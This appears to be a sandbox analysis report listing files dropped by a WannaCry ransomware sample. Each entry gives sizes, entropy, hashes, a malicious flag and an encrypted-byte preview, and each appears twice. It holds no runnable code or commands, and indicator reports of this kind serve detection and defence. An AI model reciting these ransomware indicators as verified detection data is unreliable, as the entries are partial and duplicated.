                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2097432
                                                                              Entropy (8bit):7.999917522495574
                                                                              Encrypted:true
                                                                              SSDEEP:24576:FRDBck1mWHZyDUt6/aWupxVJXQJE77jRdBsSEnxeae1+e77iEo+LdvzIrc5xSAxM:nDOof1UChXj7xPisH4+LdLnKAximyOWp
                                                                              MD5:C49DA695842947F2173AE4D10EC715D6
                                                                              SHA1:24499CBD6DCA2C99A0BAFE70DCF6BAEF7D065977
                                                                              SHA-256:76401C2397FFF9EDD7CF9A28CF9336CB137799511810FE28336668646E4A42DE
                                                                              SHA-512:6B35BD11A8F5F3AA7669EB50ED5FA55869C395F51B712381ADD43AE03C6208E1BB48425E36357A2020E92DC21DAE467268CB9BB04551263C0890AD0E2E8371CF
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....Y..W#..0..v...gA...B #K~ZU...=..z..&.$L....#II.E.R....<Te....m.<*..U.`X.L..r..J....r7....#......;.8......g........V..h.6..V......'.............p.M.,..|.-k..|....Fz......r..7...?30...'.......ha.S..F.Z:.L.Gq.b...56...O..]......-.E..h...l.............. ......._..tF..'&......K..e.&}.... a..3.m..vU.f*...H.lN2B..]\K.l...~%W.$....EK...4.#9.4..'..*w.5!;..@......*...t.=.R...-....+..n.....B..l.Y..e@.......=.(Q*......B}...g.R...."....I........D.L.9..;....8..O&..^...S..1.?.4. .......t.Db....s.......fT/B....9.#/..E_./A...%K-....X8.D.%..h?(.....u.&.............g..C...MN....`8..5F.3..P.7..2..(7.>...P.._.T....)....;..NG4.......=.h...?.B......w.IO?....D.{bqgw.q...9ba.X..?.....\\.Q.@,\.Z@..p.gj...r.....Z....."..1'...+.g).*.Y....o@s.V..[&j...P...Q...p.tdM...?Nm.....%.U.......R.vKq.C.%&..p..U......j..R?.].[KP.....%.IkR`....}.f"C).}]kR..R..g|.&....w%..2.M..1.V2 ..$k.~...;ey...-I.b.X}.O....x..e?k|<.`ZP.^i..Aj..5,]#.......m+*.`...11X..v..j.3....n..i..R.U.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2097432
                                                                              Entropy (8bit):7.999917522495574
                                                                              Encrypted:true
                                                                              SSDEEP:24576:FRDBck1mWHZyDUt6/aWupxVJXQJE77jRdBsSEnxeae1+e77iEo+LdvzIrc5xSAxM:nDOof1UChXj7xPisH4+LdLnKAximyOWp
                                                                              MD5:C49DA695842947F2173AE4D10EC715D6
                                                                              SHA1:24499CBD6DCA2C99A0BAFE70DCF6BAEF7D065977
                                                                              SHA-256:76401C2397FFF9EDD7CF9A28CF9336CB137799511810FE28336668646E4A42DE
                                                                              SHA-512:6B35BD11A8F5F3AA7669EB50ED5FA55869C395F51B712381ADD43AE03C6208E1BB48425E36357A2020E92DC21DAE467268CB9BB04551263C0890AD0E2E8371CF
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....Y..W#..0..v...gA...B #K~ZU...=..z..&.$L....#II.E.R....<Te....m.<*..U.`X.L..r..J....r7....#......;.8......g........V..h.6..V......'.............p.M.,..|.-k..|....Fz......r..7...?30...'.......ha.S..F.Z:.L.Gq.b...56...O..]......-.E..h...l.............. ......._..tF..'&......K..e.&}.... a..3.m..vU.f*...H.lN2B..]\K.l...~%W.$....EK...4.#9.4..'..*w.5!;..@......*...t.=.R...-....+..n.....B..l.Y..e@.......=.(Q*......B}...g.R...."....I........D.L.9..;....8..O&..^...S..1.?.4. .......t.Db....s.......fT/B....9.#/..E_./A...%K-....X8.D.%..h?(.....u.&.............g..C...MN....`8..5F.3..P.7..2..(7.>...P.._.T....)....;..NG4.......=.h...?.B......w.IO?....D.{bqgw.q...9ba.X..?.....\\.Q.@,\.Z@..p.gj...r.....Z....."..1'...+.g).*.Y....o@s.V..[&j...P...Q...p.tdM...?Nm.....%.U.......R.vKq.C.%&..p..U......j..R?.].[KP.....%.IkR`....}.f"C).}]kR..R..g|.&....w%..2.M..1.V2 ..$k.~...;ey...-I.b.X}.O....x..e?k|<.`ZP.^i..Aj..5,]#.......m+*.`...11X..v..j.3....n..i..R.U.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.15586088404733
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEICZszFH4Jmm74O7tPd//Jj3z6Qf6UKme+U3etOSKdZMhW02qrXWHAI:bkEICZsqom746PdJLXf6U2ueb3YXM
                                                                              MD5:34F68B92948A5A368D846FE4A24659C1
                                                                              SHA1:FAB9D73B8B3949F61F3A9DDF7842F3C70F2D9C87
                                                                              SHA-256:9AF5B33E397A67259E8903F9C49B6DFD495A705AD209941CEDE29D8124CAE610
                                                                              SHA-512:4036BC4E6BF551612808E910D2122E0E88B765628EBCD332EFF502384943DF67D3BF2C1C077B005D30AC3ECA2264D6D8E9D510615B3D92A9035403177108A859
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Q.S..>B."..Wf.Hl.Q..hW..&.v.{...........`E{......&:...B...,x.A..x.=8..X...K..{.$.<...........8h..Y.#....^......vp.W..w....We.<..12......04....n...o}8D.[..f.u:.`.......h-......5...X..-..mP.5..L..m..,..........0..\...SF...w.....I.........7.............*.......RQ.T..)...h...Z.b..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.15586088404733
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEICZszFH4Jmm74O7tPd//Jj3z6Qf6UKme+U3etOSKdZMhW02qrXWHAI:bkEICZsqom746PdJLXf6U2ueb3YXM
                                                                              MD5:34F68B92948A5A368D846FE4A24659C1
                                                                              SHA1:FAB9D73B8B3949F61F3A9DDF7842F3C70F2D9C87
                                                                              SHA-256:9AF5B33E397A67259E8903F9C49B6DFD495A705AD209941CEDE29D8124CAE610
                                                                              SHA-512:4036BC4E6BF551612808E910D2122E0E88B765628EBCD332EFF502384943DF67D3BF2C1C077B005D30AC3ECA2264D6D8E9D510615B3D92A9035403177108A859
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Q.S..>B."..Wf.Hl.Q..hW..&.v.{...........`E{......&:...B...,x.A..x.=8..X...K..{.$.<...........8h..Y.#....^......vp.W..w....We.<..12......04....n...o}8D.[..f.u:.`.......h-......5...X..-..mP.5..L..m..,..........0..\...SF...w.....I.........7.............*.......RQ.T..)...h...Z.b..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.209891852041258
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkETSxYio1T9ee3BP3rHPv2yF8I/2eyaFDLFy7qUJD7EAet2stb5L:bkETdReoB/DvV9/EcFy7pDDegstb5L
                                                                              MD5:4CF1F4588893EB4E5F86F4A29484342F
                                                                              SHA1:FE6919F2655A2F6F39D2F56DAFE71B14BA3FD160
                                                                              SHA-256:7A4150915AED694E31AF48D23F9D8A0FC204964D1C068A689EFE69FD94A1472D
                                                                              SHA-512:05294134BC98C9E0CBE6957F7983A87DFF3F73B19C2D5DB77B074EA21E243CFD9883FAF1A2685AFB0FE795488B0894C281DE3A247DC65055D023733E71F1A31D
                                                                              Malicious:false
                                                                              Preview:WANACRY!......8........J..9a.2.{...kPH}.....n.M.[.V...fRn.../.I.f..{..F..}w..J.k.'Ng9?mu_R...+..~.......B..g)...9..|~..D.N...xdU"..*.../..z.1G..I[...f.=<].Q...Z.E..K....#.3..Y.u...@....nh.A.{.o.%.....:..h..e..V...w..'Y.@41...+Q..'..GO.4p!(.~.".3.:..E.d,.P......v............s".....|z..c...!J...mD...P#.%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.209891852041258
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkETSxYio1T9ee3BP3rHPv2yF8I/2eyaFDLFy7qUJD7EAet2stb5L:bkETdReoB/DvV9/EcFy7pDDegstb5L
                                                                              MD5:4CF1F4588893EB4E5F86F4A29484342F
                                                                              SHA1:FE6919F2655A2F6F39D2F56DAFE71B14BA3FD160
                                                                              SHA-256:7A4150915AED694E31AF48D23F9D8A0FC204964D1C068A689EFE69FD94A1472D
                                                                              SHA-512:05294134BC98C9E0CBE6957F7983A87DFF3F73B19C2D5DB77B074EA21E243CFD9883FAF1A2685AFB0FE795488B0894C281DE3A247DC65055D023733E71F1A31D
                                                                              Malicious:false
                                                                              Preview:WANACRY!......8........J..9a.2.{...kPH}.....n.M.[.V...fRn.../.I.f..{..F..}w..J.k.'Ng9?mu_R...+..~.......B..g)...9..|~..D.N...xdU"..*.../..z.1G..I[...f.=<].Q...Z.E..K....#.3..Y.u...@....nh.A.{.o.%.....:..h..e..V...w..'Y.@41...+Q..'..GO.4p!(.~.".3.:..E.d,.P......v............s".....|z..c...!J...mD...P#.%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.2147027978642395
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEVsQcqDRXop7M0YXcLvhS55zQp7ATNHImJea0nD3J/+EeiT+n:bkEVW4mpoEjp70NomJe5lK
                                                                              MD5:58EAB61DD46CC17BED5AC743B014C73D
                                                                              SHA1:CB0621A4A9A51A6981EBBD5745CC3559C68DCB37
                                                                              SHA-256:F0829A31077ACF7B8A895EF39F7783C90668904224FE82725721F155944503D8
                                                                              SHA-512:F02E1F7DD4E54CD41F75F113D027AF143766940C54D001E0B727C12BA88EBC8F8F22FD44C719099F4909AD19DA9ADB90EC7D1BC39336A844562951FE479D30B5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....T.}7.'......9..1.6...0.....#n.&-...-j@Z....t.w.......#.T..h.]*dd.3..}...,O>..&./..3W!.(..CU.Z........g2/...tj.(9]/-.K.YI...KV1.......~S..........c....7.(..8..}.;..S.u..RJhr-../JD....Uo.B..`.G^..<..^.s.s....:n..B.!%... .U.98..M..@.*Q.....,.P`..V..............jU.x.S.@..X^.'.N.=8.<m.D.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.2147027978642395
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEVsQcqDRXop7M0YXcLvhS55zQp7ATNHImJea0nD3J/+EeiT+n:bkEVW4mpoEjp70NomJe5lK
                                                                              MD5:58EAB61DD46CC17BED5AC743B014C73D
                                                                              SHA1:CB0621A4A9A51A6981EBBD5745CC3559C68DCB37
                                                                              SHA-256:F0829A31077ACF7B8A895EF39F7783C90668904224FE82725721F155944503D8
                                                                              SHA-512:F02E1F7DD4E54CD41F75F113D027AF143766940C54D001E0B727C12BA88EBC8F8F22FD44C719099F4909AD19DA9ADB90EC7D1BC39336A844562951FE479D30B5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....T.}7.'......9..1.6...0.....#n.&-...-j@Z....t.w.......#.T..h.]*dd.3..}...,O>..&./..3W!.(..CU.Z........g2/...tj.(9]/-.K.YI...KV1.......~S..........c....7.(..8..}.;..S.u..RJhr-../JD....Uo.B..`.G^..<..^.s.s....:n..B.!%... .U.98..M..@.*Q.....,.P`..V..............jU.x.S.@..X^.'.N.=8.<m.D.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.163439499356946
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEZ94cfohd/+J/na7Jf31mvpqXb0TOrIzgvEIdG1Qwqqk2ZRIZ3OLW:bkEZ94cfXJwfapqr0TOrIzgvEYwqd2wJ
                                                                              MD5:394BC8BB92953F76777B15430B64CE8B
                                                                              SHA1:5AE549D1CB253C85ABB313C4346E29376B3715AC
                                                                              SHA-256:0E562895F9EA29CF377738C8865AB9E90655AF203E83BBF6DE3D75CCD13ABF3C
                                                                              SHA-512:C2A2F18AB78654572427DF6033C5B22DB245CAC5BE64FAC0E51238768D61B0E8985FF0F1DB5427CC2F60C871BC1E514D183CB7EF594A036889ADC2B38A42CE4E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........d..E..._.....r.p*3.[{xN.|'.=>..;...vN.M..-...D..==Sw.G~..^.'.........a.....yK..c..o..K......$.x....1..j`E..g....L._4..B8..d{...{.A.s~.0..p.%.w2..V.1.5..<.T...{..@....$.p...yo..q\U.0...n.....`......byy....."........o....R..C..|....................d..x.k|$|.%.!O...!......w.=.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.163439499356946
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEZ94cfohd/+J/na7Jf31mvpqXb0TOrIzgvEIdG1Qwqqk2ZRIZ3OLW:bkEZ94cfXJwfapqr0TOrIzgvEYwqd2wJ
                                                                              MD5:394BC8BB92953F76777B15430B64CE8B
                                                                              SHA1:5AE549D1CB253C85ABB313C4346E29376B3715AC
                                                                              SHA-256:0E562895F9EA29CF377738C8865AB9E90655AF203E83BBF6DE3D75CCD13ABF3C
                                                                              SHA-512:C2A2F18AB78654572427DF6033C5B22DB245CAC5BE64FAC0E51238768D61B0E8985FF0F1DB5427CC2F60C871BC1E514D183CB7EF594A036889ADC2B38A42CE4E
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........d..E..._.....r.p*3.[{xN.|'.=>..;...vN.M..-...D..==Sw.G~..^.'.........a.....yK..c..o..K......$.x....1..j`E..g....L._4..B8..d{...{.A.s~.0..p.%.w2..V.1.5..<.T...{..@....$.p...yo..q\U.0...n.....`......byy....."........o....R..C..|....................d..x.k|$|.%.!O...!......w.=.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):58600
                                                                              Entropy (8bit):7.997092043009205
                                                                              Encrypted:true
                                                                              SSDEEP:1536:k/x8+ZILpHuFf+uiNN5KRMMP+xFpHpHKglcAcfGfC5c2pPCZw+:Cx8MI1uFf+umoMMP+xbp3cAcx5cyCu+
                                                                              MD5:2D30086FDE2893E6C2ECE4FFA3D33D92
                                                                              SHA1:39B86CAED0CC04AD4EB58157DB34B3B7FD4D5826
                                                                              SHA-256:2E12420C2BA193DE9E691CEA8FEBB73EE1D11008127BD63BA03486263A21A58E
                                                                              SHA-512:BC30900055292C616935F458181DA266333FB2D278993AEC0A9180BC60F8E866550062CCA480BA77A0C999012FC04AD797356A231901AF592CBF7A17638FD225
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....f.P....3z.....>N.6.|..@.L.E>...r....u...m.F2sM.../<...J.q.z.......m.W..1.i....<.#>.[..1yZ..&CG..;.G..V...w.......Ej."6&.j^u.....:.l@.C...}.?...E..&y.....L/....F.~.V....\...D.[.M.X2....d.J.y..P..".<:E.:..a.bVPQ.M...>.Qm.f8<....GXpWT.A...l.:.M...............Ph.Kk:.lt.@.0.x......#.a6`.."17...-!..F.n7.........O......e..Qk... *1.K....t.Q......$.....w=.....@.E..ryz...rw.\.V.#...k....UaEzXj...}.[.>....J.m../..:[.g.N......F.k...v.:HB.d'.c/.",.,..)J.Q....#K...~.........$.W.....S.{....#..t......d6h.SU..$=.4MD]..sF.#...X.$..TY...4..(m.F.V..nkj.....+!%.4..1<...Ec.v...A....d.?h5.,+....w,...^."...4.M....0.....[5F!.e}..&V......;..w...;...Y......xV...M..Y.....Bce.3ej{.W........&..4....<C.c.R.j.)....!..Q....iS;..3.(m.4..#yfv......u.V.?....9.d..Z..2..dd'.......~..._.*<..8...e.6..@aNH.C....@./c...z....,..8F.G.&Z{.-...L....\e..(N.a.....@s.8....'+U..O.%$.yA..Zd..S.......9.....m..1..f.........-.L.h-..l..p#..9.^<e|...(....(......n....._cnWK.s|
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):58600
                                                                              Entropy (8bit):7.997092043009205
                                                                              Encrypted:true
                                                                              SSDEEP:1536:k/x8+ZILpHuFf+uiNN5KRMMP+xFpHpHKglcAcfGfC5c2pPCZw+:Cx8MI1uFf+umoMMP+xbp3cAcx5cyCu+
                                                                              MD5:2D30086FDE2893E6C2ECE4FFA3D33D92
                                                                              SHA1:39B86CAED0CC04AD4EB58157DB34B3B7FD4D5826
                                                                              SHA-256:2E12420C2BA193DE9E691CEA8FEBB73EE1D11008127BD63BA03486263A21A58E
                                                                              SHA-512:BC30900055292C616935F458181DA266333FB2D278993AEC0A9180BC60F8E866550062CCA480BA77A0C999012FC04AD797356A231901AF592CBF7A17638FD225
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....f.P....3z.....>N.6.|..@.L.E>...r....u...m.F2sM.../<...J.q.z.......m.W..1.i....<.#>.[..1yZ..&CG..;.G..V...w.......Ej."6&.j^u.....:.l@.C...}.?...E..&y.....L/....F.~.V....\...D.[.M.X2....d.J.y..P..".<:E.:..a.bVPQ.M...>.Qm.f8<....GXpWT.A...l.:.M...............Ph.Kk:.lt.@.0.x......#.a6`.."17...-!..F.n7.........O......e..Qk... *1.K....t.Q......$.....w=.....@.E..ryz...rw.\.V.#...k....UaEzXj...}.[.>....J.m../..:[.g.N......F.k...v.:HB.d'.c/.",.,..)J.Q....#K...~.........$.W.....S.{....#..t......d6h.SU..$=.4MD]..sF.#...X.$..TY...4..(m.F.V..nkj.....+!%.4..1<...Ec.v...A....d.?h5.,+....w,...^."...4.M....0.....[5F!.e}..&V......;..w...;...Y......xV...M..Y.....Bce.3ej{.W........&..4....<C.c.R.j.)....!..Q....iS;..3.(m.4..#yfv......u.V.?....9.d..Z..2..dd'.......~..._.*<..8...e.6..@aNH.C....@./c...z....,..8F.G.&Z{.-...L....\e..(N.a.....@s.8....'+U..O.%$.yA..Zd..S.......9.....m..1..f.........-.L.h-..l..p#..9.^<e|...(....(......n....._cnWK.s|
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.1676250056089925
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEEVzPwt4RMm9qR8bBP9LGIul0oW0f72RBpbXXbOlulG:bkEEVzPYAMm9qKVZq76nhXbblG
                                                                              MD5:DA9F410B9FA195ED49EB05DB4B99FD9D
                                                                              SHA1:A48CB459C9132167ACB355A65BA824E27DE33606
                                                                              SHA-256:123F00D85AEE14CD5BAACBF8143AEA954BEBA30A969F80321491CD615AD1FBD7
                                                                              SHA-512:24F52E04422C7283F369C54F99E4BC26AF434282D9D9B9F9B691CC374C4B957E090016E1532BFCE77FC7B26A148493769E16DA483EF455B638A46E5E49261EF9
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......#..b=...D;IaU....>g......P.T...j...........>..81..{$.....#.{.]L=...sA.R...i%..$....K......"^.rv.3n....F/.....,1+aF.N....#I.N.r..........t........L!..sBTV.,.......}.,.oe..M...f....&^[[LU"...g....$...51/.=.{1.X...s_._h.......6UK.....H.I.6).j.............Jp#...H...8.....^@..Q.j#..F4..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.1676250056089925
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEEVzPwt4RMm9qR8bBP9LGIul0oW0f72RBpbXXbOlulG:bkEEVzPYAMm9qKVZq76nhXbblG
                                                                              MD5:DA9F410B9FA195ED49EB05DB4B99FD9D
                                                                              SHA1:A48CB459C9132167ACB355A65BA824E27DE33606
                                                                              SHA-256:123F00D85AEE14CD5BAACBF8143AEA954BEBA30A969F80321491CD615AD1FBD7
                                                                              SHA-512:24F52E04422C7283F369C54F99E4BC26AF434282D9D9B9F9B691CC374C4B957E090016E1532BFCE77FC7B26A148493769E16DA483EF455B638A46E5E49261EF9
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......#..b=...D;IaU....>g......P.T...j...........>..81..{$.....#.{.]L=...sA.R...i%..$....K......"^.rv.3n....F/.....,1+aF.N....#I.N.r..........t........L!..sBTV.,.......}.,.oe..M...f....&^[[LU"...g....$...51/.=.{1.X...s_._h.......6UK.....H.I.6).j.............Jp#...H...8.....^@..Q.j#..F4..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.20746301696435
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEfXFJXGAdql50lZAcirDcOI4YavY39CrI/LvAZBrTwPeWT4sXNYmx:bkEdRGAQkVmDccYaqQIzGUmW1N9
                                                                              MD5:6729D170DB8FE833E57B623F5D812899
                                                                              SHA1:C9AEE739A80EF90E9B4CA7AF65D7904950B0E765
                                                                              SHA-256:CF434883F255D9B756D1BD7FE22080BE562BDE8A5F96390D888E209E654B8FC6
                                                                              SHA-512:6DA651002276A796AAE5BB09CD2DBB4E93EDE9EE98C434BA50F3C5636C2D1E27A5D077FE41BB8F3CCBB4FEC4DD16892B6CE193DA0BF02AC5DB0F09AF7AF0E03D
                                                                              Malicious:false
                                                                              Preview:WANACRY!......S..S..`=...43.....6..@......%.Cbc>\...P\..9J%...\J!.Z..(..J.....U+5[.4.....@..k..BI.......0..w..i..s..i..i.k..8/T{)..j.M....W.....Sz....Ng.?b.6.i.u.{py<e4..f..nu......Y..e..--.$b..3c.r.Z..Q..E...&d.c..fd0....>.v\....M.......|2.;.*....0.i..............u.....g.....)|P/.B1'.....7..Y
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.20746301696435
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEfXFJXGAdql50lZAcirDcOI4YavY39CrI/LvAZBrTwPeWT4sXNYmx:bkEdRGAQkVmDccYaqQIzGUmW1N9
                                                                              MD5:6729D170DB8FE833E57B623F5D812899
                                                                              SHA1:C9AEE739A80EF90E9B4CA7AF65D7904950B0E765
                                                                              SHA-256:CF434883F255D9B756D1BD7FE22080BE562BDE8A5F96390D888E209E654B8FC6
                                                                              SHA-512:6DA651002276A796AAE5BB09CD2DBB4E93EDE9EE98C434BA50F3C5636C2D1E27A5D077FE41BB8F3CCBB4FEC4DD16892B6CE193DA0BF02AC5DB0F09AF7AF0E03D
                                                                              Malicious:false
                                                                              Preview:WANACRY!......S..S..`=...43.....6..@......%.Cbc>\...P\..9J%...\J!.Z..(..J.....U+5[.4.....@..k..BI.......0..w..i..s..i..i.k..8/T{)..j.M....W.....Sz....Ng.?b.6.i.u.{py<e4..f..nu......Y..e..--.$b..3c.r.Z..Q..E...&d.c..fd0....>.v\....M.......|2.;.*....0.i..............u.....g.....)|P/.B1'.....7..Y
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.30177739851689
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEkE9e4B2lvPVqSrD6BpBFS6x5wyPKP8VqQsBt48SkosS2rzQVNKl6:bkEkh4gvPVqYD6LBFJgmgt1SsSgzQXj
                                                                              MD5:5E5B8F4BA4E2215094BA012B4AE4D81B
                                                                              SHA1:9680C9ED585B7BFA08802C22D48143079D865578
                                                                              SHA-256:37E8C6D980B59AF1D27EF1B8D8652224083F5D4D39AA59D1CDC6FEA7413DEC7A
                                                                              SHA-512:E0481832D59C831A026DA86A6902DC7EE7DD0D20ABFE8D50CADF5DB7423B8D6E81FCAB5AFD7FC6F6AB21048B6D1FF50BD7B5233B1862DC8B033A6AFECCDAD5DF
                                                                              Malicious:false
                                                                              Preview:WANACRY!....>.m.{-.......f.d.w...v.R.|N..O@...wD......X.^..<...T..N....[............R..<....k.70..\U.^.Yyz"W../..Q\.....^E.H..................*.y...d.<.$..hP.0..}A..Ta..z.4..l......P...0.r.:....\7.b\...&..f.n.:.v.`.'.9G..c..p....Yp..9.......L$.. ...............1<..........Y..;.rh1+a.sD.w..M..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.30177739851689
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEkE9e4B2lvPVqSrD6BpBFS6x5wyPKP8VqQsBt48SkosS2rzQVNKl6:bkEkh4gvPVqYD6LBFJgmgt1SsSgzQXj
                                                                              MD5:5E5B8F4BA4E2215094BA012B4AE4D81B
                                                                              SHA1:9680C9ED585B7BFA08802C22D48143079D865578
                                                                              SHA-256:37E8C6D980B59AF1D27EF1B8D8652224083F5D4D39AA59D1CDC6FEA7413DEC7A
                                                                              SHA-512:E0481832D59C831A026DA86A6902DC7EE7DD0D20ABFE8D50CADF5DB7423B8D6E81FCAB5AFD7FC6F6AB21048B6D1FF50BD7B5233B1862DC8B033A6AFECCDAD5DF
                                                                              Malicious:false
                                                                              Preview:WANACRY!....>.m.{-.......f.d.w...v.R.|N..O@...wD......X.^..<...T..N....[............R..<....k.70..\U.^.Yyz"W../..Q\.....^E.H..................*.y...d.<.$..hP.0..}A..Ta..z.4..l......P...0.r.:....\7.b\...&..f.n.:.v.`.'.9G..c..p....Yp..9.......L$.. ...............1<..........Y..;.rh1+a.sD.w..M..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.135947424404496
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEshN30jVfHE6ZYeS0hWhCQCD/BpAzHdLIZVyby:bkE9VfzZbFWwnDLq6v7
                                                                              MD5:48FE4D8EED3472A5B47875B23DA68CA6
                                                                              SHA1:E26E81ACF6012A49958609628DB911C06ED271AA
                                                                              SHA-256:8655C1D6CB3C47E97FE2231A0BCDA0893DFE74ECD8F9E35B72B8B2F54E1E7BD0
                                                                              SHA-512:EC1F92A5CB642E768F75D4544E3C8287F955DD06196C3108C353601ADECE076260B5001840A8923CCC4214439D429D7333968014A4E5C58B382FA6E89DD1A338
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....c.Z.....Snf..I...&..g.w[.\....kO&..W~;p..}......lN.A...>.{#.!..H...e{....?y.........p.......%.6F..../..y....D...p..2..p7Dy#..c.L'.-..+G..,..X..fT..! ....27.E....&..T../..-g.[Fr[.[..xh.I.7..L].EA....pb/...&.....O.3.|.|8.jc,...`[2g.^..O..7...............AD..&.K.Y..Tw].I...... ......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.135947424404496
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEshN30jVfHE6ZYeS0hWhCQCD/BpAzHdLIZVyby:bkE9VfzZbFWwnDLq6v7
                                                                              MD5:48FE4D8EED3472A5B47875B23DA68CA6
                                                                              SHA1:E26E81ACF6012A49958609628DB911C06ED271AA
                                                                              SHA-256:8655C1D6CB3C47E97FE2231A0BCDA0893DFE74ECD8F9E35B72B8B2F54E1E7BD0
                                                                              SHA-512:EC1F92A5CB642E768F75D4544E3C8287F955DD06196C3108C353601ADECE076260B5001840A8923CCC4214439D429D7333968014A4E5C58B382FA6E89DD1A338
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....c.Z.....Snf..I...&..g.w[.\....kO&..W~;p..}......lN.A...>.{#.!..H...e{....?y.........p.......%.6F..../..y....D...p..2..p7Dy#..c.L'.-..+G..,..X..fT..! ....27.E....&..T../..-g.[Fr[.[..xh.I.7..L].EA....pb/...&.....O.3.|.|8.jc,...`[2g.^..O..7...............AD..&.K.Y..Tw].I...... ......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1048856
                                                                              Entropy (8bit):7.9998183182874225
                                                                              Encrypted:true
                                                                              SSDEEP:24576:7oynKeifKNOIRiyEWdTLTKfbvTO/4zzsT:7oB3S/R0mLTKbET
                                                                              MD5:AC3FBC0D9196F24A778C6C154C870703
                                                                              SHA1:BB2690AFBFF49EAE8EA7ABA97281135CBF0400DE
                                                                              SHA-256:5545F8371D0BE78D8B0AEA1CEB47045D89472E5CB473AFF47BBCA46BFE03371F
                                                                              SHA-512:D995A615A6BD33EF15D47B2D76379B03EC7C4FC50FAFA0F980FCDEFA835DB34AB43A365E7337B185BE1ABA8128C49F409D3477D76209CD1CD3C49F8B3E095529
                                                                              Malicious:true
